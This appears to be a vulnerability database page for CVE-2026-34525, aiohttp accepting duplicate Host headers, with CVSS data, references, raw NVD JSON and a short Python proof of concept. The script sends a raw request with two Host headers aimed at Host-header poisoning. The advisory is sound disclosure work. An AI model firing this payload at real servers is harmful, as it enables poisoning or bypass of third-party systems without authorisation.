CVE-2026-34525

Description

AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, multiple Host headers were allowed in aiohttp. This issue has been patched in version 3.13.4.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:* - VULNERABLE

aiohttp < 3.13.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

def send_duplicate_host_poc(target_ip, target_port, path="/"):
    """
    PoC for CVE-2026-34525: Sending a request with duplicate Host headers.
    """
    # Constructing raw HTTP request with duplicate Host headers
    # The first Host might be checked by a WAF, the second by the backend aiohttp.
    payload = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: trusted-site.com\r\n"  # First Host header
        f"Host: malicious-site.com\r\n" # Second Host header (Potential Poisoning)
        f"User-Agent: PoC-Client/1.0\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )

    try:
        print(f"[*] Sending payload to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.sendall(payload.encode())
        response = s.recv(4096)
        print("[+] Response received:")
        print(response.decode(errors='ignore'))
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage Example (Uncomment to test):
# send_duplicate_host_poc("127.0.0.1", 8080, "/")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34525
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34525
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34525/
[4] VulDB https://vuldb.com/cve/CVE-2026-34525
[5] https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000
[6] https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349
[7] https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4
[8] https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34525", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.490", "lastModified": "2026-04-16T16:21:56.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, multiple Host headers were allowed in aiohttp. This issue has been patched in version 3.13.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.13.4", "matchCriteriaId": "7B8B1C30-52F7-467A-A7D0-F6A786E84AF9"}]}]}], "references": [{"url": "https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}